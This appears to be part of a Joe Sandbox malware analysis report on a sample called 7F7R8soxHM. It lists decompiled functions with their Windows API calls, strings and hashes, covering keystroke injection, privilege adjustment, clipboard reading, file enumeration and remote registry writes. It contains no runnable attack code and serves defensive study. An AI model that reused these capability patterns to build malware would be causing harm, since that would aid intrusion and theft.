Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 6b5f23f48cc1618d68bbb027b6ff49d513f4902ed6f7425cab236442077d6d80
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: E2B0927684020C77DE422E82EC02A593B599B40678F808020FB1C28162A673A6A09689

Function 00EDD2E6 Relevance: 1.4, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000002,00000000), ref: 00EDD46A

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 9912fc62e9b9703ee1cba217e467deb4e4d01a0fa2d799552a20e57a2f819647
Instruction ID: 87b735159eb3ccbd777c41a91e4f49c1440187197139350bf7f679fc5a1a77ab
Opcode Fuzzy Hash: 9912fc62e9b9703ee1cba217e467deb4e4d01a0fa2d799552a20e57a2f819647
Instruction Fuzzy Hash: EC7187316083018FC714EF24D891A6EB7E4EF88314F04556EF59AAB392DB70ED45CB52

Function 00E90E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00E90EF7

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: a9baceed18c1be8a8783994f2eeb7f6230cdae3ba21416acedd77025cc405ae3
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 3331C471A00105DFCF18DF58D4809A9F7A6FF59304BA4AAA5E909EB651D731EEC1CBC0

Function 017122FC Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 01712311

Memory Dump Source

Source File: 00000000.00000002.1658953841.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1710000_7F7R8soxHM.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: 227e751013742c831fcbd4d00930e85e96d2a23df95ea0770d70542fab817d76
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: 05E09A7494010DAFDB00EFA8D54969E7BB4EF04301F1005A1FD0596681DA309A548A62

Function 01712300 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 01712311

Memory Dump Source

Source File: 00000000.00000002.1658953841.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1710000_7F7R8soxHM.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: e47a5f3e6b1fa288be46f99e9e0743d9621c03cf621822ad238a14d89bbf1177
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: ACE0E67494010DDFDB00EFF8D54969E7FB4EF04301F100561FD01D2281D6309D508A62

Non-executed Functions

Function 00EFCDAC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00E72612: GetWindowLongW.USER32(?,000000EB), ref: 00E72623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00EFCE50
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00EFCE91
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00EFCED6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00EFCF00
SendMessageW.USER32 ref: 00EFCF29
_wcsncpy.LIBCMT ref: 00EFCFA1
GetKeyState.USER32(00000011), ref: 00EFCFC2
GetKeyState.USER32(00000009), ref: 00EFCFCF
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00EFCFE5
GetKeyState.USER32(00000010), ref: 00EFCFEF
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00EFD018
SendMessageW.USER32 ref: 00EFD03F
SendMessageW.USER32(?,00001030,?,00EFB602), ref: 00EFD145
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00EFD15B
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00EFD16E
SetCapture.USER32(?), ref: 00EFD177
ClientToScreen.USER32(?,?), ref: 00EFD1DC
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00EFD1E9
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00EFD203
ReleaseCapture.USER32 ref: 00EFD20E
GetCursorPos.USER32(?), ref: 00EFD248
ScreenToClient.USER32(?,?), ref: 00EFD255
SendMessageW.USER32(?,00001012,00000000,?), ref: 00EFD2B1
SendMessageW.USER32 ref: 00EFD2DF
SendMessageW.USER32(?,00001111,00000000,?), ref: 00EFD31C
SendMessageW.USER32 ref: 00EFD34B
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00EFD36C
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00EFD37B
GetCursorPos.USER32(?), ref: 00EFD39B
ScreenToClient.USER32(?,?), ref: 00EFD3A8
GetParent.USER32(?), ref: 00EFD3C8
SendMessageW.USER32(?,00001012,00000000,?), ref: 00EFD431
SendMessageW.USER32 ref: 00EFD462
ClientToScreen.USER32(?,?), ref: 00EFD4C0
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00EFD4F0
SendMessageW.USER32(?,00001111,00000000,?), ref: 00EFD51A
SendMessageW.USER32 ref: 00EFD53D
ClientToScreen.USER32(?,?), ref: 00EFD58F
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00EFD5C3

Part of subcall function 00E725DB: GetWindowLongW.USER32(?,000000EB), ref: 00E725EC

GetWindowLongW.USER32(?,000000F0), ref: 00EFD65F

Strings

F, xrefs: 00EFD543
@GUI_DRAGID, xrefs: 00EFD1AA

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: 0ea5d63b53b4e8c46a3add1ab36b503743afd40c7e0dbaa81d4da6c9a43acef4
Instruction ID: e41f1ba0f6a21cb50ae367d4227e08ad0849353f0fb4905d04a61d5b0bad3d22
Opcode Fuzzy Hash: 0ea5d63b53b4e8c46a3add1ab36b503743afd40c7e0dbaa81d4da6c9a43acef4
Instruction Fuzzy Hash: 7C42BE34208249EFC721CF28C944ABABBE6FF88318F24551DF795E72A1C7319954DB92

Function 00EF804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00EF873F

Strings

%d/%02d/%02d, xrefs: 00EF8478

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: 92e9b6d6e9a1523ef91128390ac8162424b91f6ec477ac890f4332d7d03ccd26
Instruction ID: 9398fe6dec977e6771021a1600f4a7d201c9368c17588721315551a0d177c34e
Opcode Fuzzy Hash: 92e9b6d6e9a1523ef91128390ac8162424b91f6ec477ac890f4332d7d03ccd26
Instruction Fuzzy Hash: AC12CF71600208AFEB259F25CD49FBA7BB4EF85714F20A129FA15FA2E1DF708945CB50

Function 00E8710E Relevance: 50.6, APIs: 19, Strings: 7, Instructions: 5093COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E875C2
_memset.LIBCMT ref: 00E876B1
_memmove.LIBCMT ref: 00E87C4B
_memmove.LIBCMT ref: 00E87E4F

Strings

\b(?=\w), xrefs: 00EC3C34
[:<:]], xrefs: 00E875F1
Q\E, xrefs: 00E881C1
\b(?<=\w), xrefs: 00EC3C41
Oa, xrefs: 00EC287E
DEFINE, xrefs: 00EC25AF
[:>:]], xrefs: 00E8760A

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: _memmove$_memset
String ID: DEFINE$Oa$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
API String ID: 1357608183-2202602582
Opcode ID: 13bb8b558f7bbe80e965ea1e56e3ff52b6cd6ece4682cb93c9945acfcced93a7
Instruction ID: b3ac3811f2180078d5e50be5bf49e333ab54f583795be6c3a60c192f44920039
Opcode Fuzzy Hash: 13bb8b558f7bbe80e965ea1e56e3ff52b6cd6ece4682cb93c9945acfcced93a7
Instruction Fuzzy Hash: 6093A171A00215DBDB24DF68C981BEDB7B1FF48314F24916EE959BB290E7719E82CB40

Function 00E74A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 00E74A3D
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EADA8E
IsIconic.USER32(?), ref: 00EADA97
ShowWindow.USER32(?,00000009), ref: 00EADAA4
SetForegroundWindow.USER32(?), ref: 00EADAAE
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00EADAC4
GetCurrentThreadId.KERNEL32 ref: 00EADACB
GetWindowThreadProcessId.USER32(?,00000000), ref: 00EADAD7
AttachThreadInput.USER32(?,00000000,00000001), ref: 00EADAE8
AttachThreadInput.USER32(?,00000000,00000001), ref: 00EADAF0
AttachThreadInput.USER32(00000000,?,00000001), ref: 00EADAF8
SetForegroundWindow.USER32(?), ref: 00EADAFB
MapVirtualKeyW.USER32(00000012,00000000), ref: 00EADB10
keybd_event.USER32(00000012,00000000), ref: 00EADB1B
MapVirtualKeyW.USER32(00000012,00000000), ref: 00EADB25
keybd_event.USER32(00000012,00000000), ref: 00EADB2A
MapVirtualKeyW.USER32(00000012,00000000), ref: 00EADB33
keybd_event.USER32(00000012,00000000), ref: 00EADB38
MapVirtualKeyW.USER32(00000012,00000000), ref: 00EADB42
keybd_event.USER32(00000012,00000000), ref: 00EADB47
SetForegroundWindow.USER32(?), ref: 00EADB4A
AttachThreadInput.USER32(?,?,00000000), ref: 00EADB71

Strings

Shell_TrayWnd, xrefs: 00EADA89

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: a44a17ffb747e6b8dd4b418a40815ec0ee227d858f208d79a5ad1639d9239997
Instruction ID: a4d79d68a5dcc8cc0687976858f3d3be5a3f3610907c24bd549a36f563832894
Opcode Fuzzy Hash: a44a17ffb747e6b8dd4b418a40815ec0ee227d858f208d79a5ad1639d9239997
Instruction Fuzzy Hash: 8F317571A443187FEB206F629C49F7E7E6CEF88B50F114065FA05FA1D0CA705D10EAA0

Function 00EC8858 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00EC8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EC8D0D
Part of subcall function 00EC8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EC8D3A
Part of subcall function 00EC8CC3: GetLastError.KERNEL32 ref: 00EC8D47

_memset.LIBCMT ref: 00EC889B
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00EC88ED
CloseHandle.KERNEL32(?), ref: 00EC88FE
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00EC8915
GetProcessWindowStation.USER32 ref: 00EC892E
SetProcessWindowStation.USER32(00000000), ref: 00EC8938
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00EC8952

Part of subcall function 00EC8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00EC8851), ref: 00EC8728
Part of subcall function 00EC8713: CloseHandle.KERNEL32(?,?,00EC8851), ref: 00EC873A

Strings

default, xrefs: 00EC894D
, xrefs: 00EC88AA
winsta0, xrefs: 00EC8910

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 97feefa47c1f1f42e10bedc4a4ebfed8c21bebaebedfee24f7e6287837bef63f
Instruction ID: 9cf9b6ad2472bc29359a4c49333e586e38c5f545538e73571b705b95ab00229b
Opcode Fuzzy Hash: 97feefa47c1f1f42e10bedc4a4ebfed8c21bebaebedfee24f7e6287837bef63f
Instruction Fuzzy Hash: D5813E71900209AFDF11DFA4DF45EEEBBB8AF04308F08516AF924B6161DB328E15DB60

Function 00EE425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00EFF910), ref: 00EE4284
IsClipboardFormatAvailable.USER32(0000000D), ref: 00EE4292
GetClipboardData.USER32(0000000D), ref: 00EE429A
CloseClipboard.USER32 ref: 00EE42A6
GlobalLock.KERNEL32(00000000), ref: 00EE42C2
CloseClipboard.USER32 ref: 00EE42CC
GlobalUnlock.KERNEL32(00000000,00000000), ref: 00EE42E1
IsClipboardFormatAvailable.USER32(00000001), ref: 00EE42EE
GetClipboardData.USER32(00000001), ref: 00EE42F6
GlobalLock.KERNEL32(00000000), ref: 00EE4303
GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00EE4337
CloseClipboard.USER32 ref: 00EE4447

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 35d5664b9b157503dfbe077f520430c99a038f126020faec93fbd38b23a5f443
Instruction ID: 0aed93331d85cd1b4b5949e09b7f2d6799af5ab82db8fd52ffec5ec2e6f6319c
Opcode Fuzzy Hash: 35d5664b9b157503dfbe077f520430c99a038f126020faec93fbd38b23a5f443
Instruction Fuzzy Hash: FE51807120424AAFD311AF62EC95F7E77A8AF84B00F105529F55AF21E1DF70D909CB62

Function 00EDC9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00EDC9F8
FindClose.KERNEL32(00000000), ref: 00EDCA4C
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00EDCA71
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00EDCA88
FileTimeToSystemTime.KERNEL32(?,?), ref: 00EDCAAF
__swprintf.LIBCMT ref: 00EDCAFB
__swprintf.LIBCMT ref: 00EDCB3E

Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82

__swprintf.LIBCMT ref: 00EDCB92

Part of subcall function 00E938D8: __woutput_l.LIBCMT ref: 00E93931

__swprintf.LIBCMT ref: 00EDCBE0

Part of subcall function 00E938D8: __flsbuf.LIBCMT ref: 00E93953
Part of subcall function 00E938D8: __flsbuf.LIBCMT ref: 00E9396B

__swprintf.LIBCMT ref: 00EDCC2F
__swprintf.LIBCMT ref: 00EDCC7E
__swprintf.LIBCMT ref: 00EDCCCD

Strings

%4d, xrefs: 00EDCB38
%02d, xrefs: 00EDCB86, 00EDCB90, 00EDCBDE, 00EDCC2D, 00EDCC7C, 00EDCCCB
%4d%02d%02d%02d%02d%02d, xrefs: 00EDCAF5

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 47fe528991b849885bd9c9e9260c1f866a2691eb7aa83f25754c84e759f31ebe
Instruction ID: 84bb4eb12842f8eaa2c7150b76094f2a2e7f8d2a50ddc4166f6be945a7fe2c85
Opcode Fuzzy Hash: 47fe528991b849885bd9c9e9260c1f866a2691eb7aa83f25754c84e759f31ebe
Instruction Fuzzy Hash: F4A152B1508305ABC714EB64C885DAFB7ECFF94700F40592AF599E7192EB34DA09CB62

Function 00EDF200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00EDF221
_wcscmp.LIBCMT ref: 00EDF236
_wcscmp.LIBCMT ref: 00EDF24D
GetFileAttributesW.KERNEL32(?), ref: 00EDF25F
SetFileAttributesW.KERNEL32(?,?), ref: 00EDF279
FindNextFileW.KERNEL32(00000000,?), ref: 00EDF291
FindClose.KERNEL32(00000000), ref: 00EDF29C
FindFirstFileW.KERNEL32(*.*,?), ref: 00EDF2B8
_wcscmp.LIBCMT ref: 00EDF2DF
_wcscmp.LIBCMT ref: 00EDF2F6
SetCurrentDirectoryW.KERNEL32(?), ref: 00EDF308
SetCurrentDirectoryW.KERNEL32(00F2A5A0), ref: 00EDF326
FindNextFileW.KERNEL32(00000000,00000010), ref: 00EDF330
FindClose.KERNEL32(00000000), ref: 00EDF33D
FindClose.KERNEL32(00000000), ref: 00EDF34F

Strings

*.*, xrefs: 00EDF2B3

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: a5d15d32ee4cbe2cc3a43ddfae91d5e7c9b2d8e78ed442c3513882c0e75ecbfc
Instruction ID: 51f2437b359abcd89c923a3c0625b0dfef8cb10246e0c911d10f6ceca99f5ff1
Opcode Fuzzy Hash: a5d15d32ee4cbe2cc3a43ddfae91d5e7c9b2d8e78ed442c3513882c0e75ecbfc
Instruction Fuzzy Hash: 3731D0765002196FDF10DBB4EC89AEE73ACEF48324F145176E801F32A0EB30DA4ACA54

Function 00EF0AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EF0BDE
RegCreateKeyExW.ADVAPI32(?,?,00000000,00EFF910,00000000,?,00000000,?,?), ref: 00EF0C4C
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00EF0C94
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00EF0D1D
RegCloseKey.ADVAPI32(?), ref: 00EF103D
RegCloseKey.ADVAPI32(00000000), ref: 00EF104A

Strings

REG_SZ, xrefs: 00EF0D5B
REG_DWORD, xrefs: 00EF0F0E
REG_MULTI_SZ, xrefs: 00EF0E05
REG_EXPAND_SZ, xrefs: 00EF0CBA
REG_QWORD, xrefs: 00EF0F8B
REG_BINARY, xrefs: 00EF0FD8

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: f3796d660e81dd285dc73f3a5e9217d893885e82c2c7f9823d0e6b345e8334aa
Instruction ID: c414547833f1b3a8b2ee23a20627959a034f67637e0bddd11a99f2cb8b278301
Opcode Fuzzy Hash: f3796d660e81dd285dc73f3a5e9217d893885e82c2c7f9823d0e6b345e8334aa
Instruction Fuzzy Hash: F2025D752006159FDB14EF25C895E2AB7E5FF88724F04985DF98AAB362CB30ED41CB81

Function 00EDF35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00EDF37E
_wcscmp.LIBCMT ref: 00EDF393
_wcscmp.LIBCMT ref: 00EDF3AA

Part of subcall function 00ED45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00ED45DC

FindNextFileW.KERNEL32(00000000,?), ref: 00EDF3D9
FindClose.KERNEL32(00000000), ref: 00EDF3E4
FindFirstFileW.KERNEL32(*.*,?), ref: 00EDF400
_wcscmp.LIBCMT ref: 00EDF427
_wcscmp.LIBCMT ref: 00EDF43E
SetCurrentDirectoryW.KERNEL32(?), ref: 00EDF450
SetCurrentDirectoryW.KERNEL32(00F2A5A0), ref: 00EDF46E
FindNextFileW.KERNEL32(00000000,00000010), ref: 00EDF478
FindClose.KERNEL32(00000000), ref: 00EDF485
FindClose.KERNEL32(00000000), ref: 00EDF497

Strings

*.*, xrefs: 00EDF3FB

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

